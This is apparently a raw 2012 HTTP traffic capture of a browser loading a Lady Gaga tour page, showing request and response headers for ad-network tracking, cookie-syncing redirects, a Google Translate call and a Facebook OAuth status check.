Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU; sess=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:49 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG5EfCxrx)0s]#%2L_'x%SEV/hnKD(Um`lD$aWqNdWhK:b-Z]D; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 06 Nov 2012 16:44:49 GMT
Content-Length: 0
GET /seg?add=412023&t=1 HTTP/1.1

Host: ib.adnxs.com
GET /seg?add=412023&amp;t=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU; sess=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:49 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu98Ep.Ii!9ZZKnmJW/AstWS0R!o)Bfx+IdjXy7L)iRUZ'lI; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 06 Nov 2012 16:44:49 GMT
Content-Length: 217
GET /translate_a/l?client=te&alpha=true&hl=en&cb=_callbacks_._0h9791opx HTTP/1.1

Host: translate.googleapis.com
GET /translate_a/l?client=te&amp;alpha=true&amp;hl=en&amp;cb=_callbacks_._0h9791opx HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:49 GMT
Expires: Tue, 06 Nov 2012 16:44:49 GMT
Cache-Control: private, max-age=86400
Content-Language: en
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 652
X-XSS-Protection: 1; mode=block
GET /seg?add=412049&t=1 HTTP/1.1

Host: ib.adnxs.com
GET /seg?add=412049&amp;t=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu98Ep.Ii!9ZZKnmJW/AstWS0R!o)Bfx+9w/dJ7L)iRU3Nu$; sess=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:49 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.Ii!9ZZKnmJW/Aq[R'TxPDt/pm(sVL/EhDnHk.SUEc21ch&gt;:/sDPPi5fW; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 06 Nov 2012 16:44:49 GMT
Content-Length: 158
GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1

Host: view.atdmt.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: AA002=1350344862-22301988; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA
HTTP/1.1 200 OK

Content-Type: text/html
Cache-Control: no-store
Content-Encoding: gzip
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:48 GMT
Connection: close
Content-Length: 381
GET /dialog/oauth?client_id=34617625687&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.ladygaga.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D14%23cb%3Df2268007489c244%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ffd55eeec4113a%26domain%3Dwww.ladygaga.com%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
GET /dialog/oauth?client_id=34617625687&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=www.ladygaga.com&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D14%23cb%3Df2268007489c244%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ffd55eeec4113a%26domain%3Dwww.ladygaga.com%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: kjZzQG2xpZCCk0b2uG/EopShSqaslRmrGF42j0CU0uA=
Date: Tue, 06 Nov 2012 16:44:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /seg?add=412023&t=1 HTTP/1.1

Host: ib.adnxs.com
GET /seg?add=412023&amp;t=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu98Ep.Ii!9ZZKnmJW/AstWS0R!o)Bfx+IdjXy7L)iRUZ'lI; sess=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:49 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh8Ep.Ii!9ZZKnmJW/Aq[R'TxPDt/pm(sVL/EhDnHkXaTdC21cgG!$k?ab+Zl5; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 06 Nov 2012 16:44:49 GMT
Content-Length: 158
GET /seg?add=412001&t=1 HTTP/1.1

Host: ib.adnxs.com
GET /seg?add=412001&amp;t=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu98Ep.Ii!9ZZKnmJW/AstWS0R!o)Bfx+IdjXy7L)iRUZ'lI; sess=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:49 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.Ii!9ZZKnmJW/Av4R&gt;2qa!.#Qyd0E5l3Q7WRpKt7&gt;=RAU%!08]/p; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 06 Nov 2012 16:44:49 GMT
Content-Length: 90
GET /seg?add=412118&t=1 HTTP/1.1

Host: ib.adnxs.com
GET /seg?add=412118&amp;t=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu98Ep.Ii!9ZZKnmJW/AstWS0R!o)Bfx+IdjXy7L)iRUZ'lI; sess=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:49 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu98Ep.Ii!9ZZKnmJW/AstWS0R!o)Bfx+IdjXy7L)iRUZ'lI; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 06 Nov 2012 16:44:49 GMT
Content-Length: 0
GET /images/pixel.gif HTTP/1.1

Host: spe.atdmt.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: AA002=1350344862-22301988; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 42
Allow: GET
Expires: Mon, 12 Nov 2012 19:09:54 GMT
Date: Tue, 06 Nov 2012 16:44:49 GMT
Connection: keep-alive
GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

Host: ib.adnxs.com
GET /pxj?bidder=55&amp;action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.Ii!9ZZKnmJW/Aq[R'TxPDt/pm(sVL/EhDnHk.SUEc21ch&gt;:/sDPPi5fW; sess=1
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:49 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.Ii!9ZZKnmJW/Aq[R'TxPDt/pm(sVL/EhDnHk.SUEc21ch&gt;:/sDPPi5fW; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Tue, 06 Nov 2012 16:44:49 GMT
GET /5/c=938/rand=781084718/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: cc=&quot;ACN4nGOQTzRMSrRINDQ2MDJLNjVJMbBISjE0MjFJtEg2SUqzMGcAgoCZdjUMYMBodW2OeBCYKdSsLMnEwJbDwPCfkYGBeRWQBilgYGAS%2BFmHXaJ3mhNMghEqwQiRmDUTu0SDoDJ2o5qljHDYsWEbLh15OJz77RAuf0TjMOqnDg7LT%2Fdi90fzTz0cOjap4pJQwy6R4jsPh6t4mnBIsH3FLsHAx52wC9PB3Ak7MQUn6ihAOYwgzjJkTiEyZwuCo8z1BtMgzie3sQg%2Bfoop2C54GFOwYNE5TEGnf4swBfmqBLGZ%2BRpTEADJlJcI&quot;; dc=1; aud=&quot;ABR4nGNgYGAImGlXw8DAaHVtjngQAwcDg9cqBhBwPQihjoEpywYIbw6EWgmmFKshPMYGhgYAxd0LMQ%3D%3D&quot;; OAID=a1ba8a13026c54d08bd1244a8c4bf87
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:49 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.11.22
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: aud=&quot;ABR4nGNgYGAImGnXyMDAaHVtjuZaBg4GBq9VDCDgehBCHQNTlg0Q3hwwpVgN4a2EUIwNDA0A3h8Low%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:49 GMT;Max-Age=23328000 OAID=a1ba8a13026c54d08bd1244a8c4bf87;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:49 GMT cc=&quot;ACN4nGOQTzRMSrRINDQ2MDJLNjVJMbBISjE0MjFJtEg2SUqzMGcAgoCZdo3%2F%2F%2F%2F%2FzcDAaHVtjuZakBiDUO80JyYGthwGhv%2BMjAzMq4A0AyMQMjAL%2FKyDSTBAJRjAEs3KktglemfNxG5Ug6AyDqOkjHAYtWEbLh152CUEvh3CIfEzGodRP3VwWH66F7s%2Fmn%2Fq4dCxSRWXhBp2iRTfeThcxdOEQ4LtK3YJBj7uhF2YDuZO2IkpOFFHAcphBHGWIXMKkTlbEBxlrjeYBnE%2BuY1F8PFTTMF2wcOYggWLzmEKOv1bhCnIVyWIzczXmIIAoUybhA%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:49 GMT;Max-Age=23328000
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 259
GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1

Host: view.atdmt.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: AA002=1350344862-22301988; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA
HTTP/1.1 200 OK

Content-Type: text/html
Cache-Control: no-store
Content-Encoding: gzip
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:48 GMT
Connection: close
Content-Length: 381
GET /cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&nwid=10000602235&sigv=1 HTTP/1.1

Host: ad.yieldmanager.com
GET /cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&amp;nwid=10000602235&amp;sigv=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
HTTP/1.1 302 Found

Content-Type: text/plain; charset=utf-8
Date: Tue, 06 Nov 2012 16:44:49 GMT
P3P: policyref=&quot;http://p3p.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV&quot;
Location: http://ib.adnxs.com/ymapuid?xid=E0
Cache-Control: private
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
GET /getuid?http%3A%2F%2Fbcp.crwdcntrl.net%2Fmap%2Fc=281%2Frand=93929643%2Ftpid%3D%24UID%2Ftp%3DANXS HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/c=938/rand=781084718/pv=y/rt=ifr
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.Ii!9ZZKnmJW/Aq[R'TxPDt/pm(sVL/EhDnHk.SUEc21ch&gt;:/sDPPi5fW; sess=1
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:49 GMT; domain=.adnxs.com; HttpOnly
Location: http://bcp.crwdcntrl.net/map/c=281/rand=93929643/tpid=5858721859426781856/tp=ANXS
Date: Tue, 06 Nov 2012 16:44:49 GMT
Content-Length: 0
GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

Host: ib.adnxs.com
GET /pxj?bidder=55&amp;action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.Ii!9ZZKnmJW/Aq[R'TxPDt/pm(sVL/EhDnHk.SUEc21ch&gt;:/sDPPi5fW; sess=1
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:49 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.Ii!9ZZKnmJW/Aq[R'TxPDt/pm(sVL/EhDnHk.SUEc21ch&gt;:/sDPPi5fW; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Tue, 06 Nov 2012 16:44:49 GMT
GET /ymapuid?xid=E0 HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.Ii!9ZZKnmJW/Aq[R'TxPDt/pm(sVL/EhDnHk.SUEc21ch&gt;:/sDPPi5fW; sess=1
HTTP/1.1 200 OK

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:49 GMT; domain=.adnxs.com; HttpOnly uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 06 Nov 2012 16:44:49 GMT
Content-Length: 0
GET /CACMSH.ashx?t=1 HTTP/1.1

Host: cm.ac3.msn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: private
Location: http://m.adnxs.com/msftcookiehandler?t=1&amp;c=
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP=&quot;BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo&quot;
Date: Tue, 06 Nov 2012 16:44:49 GMT
Content-Length: 13
GET /translate_a/l?client=te&alpha=true&hl=en&cb=_callbacks_._0h9791pc8 HTTP/1.1

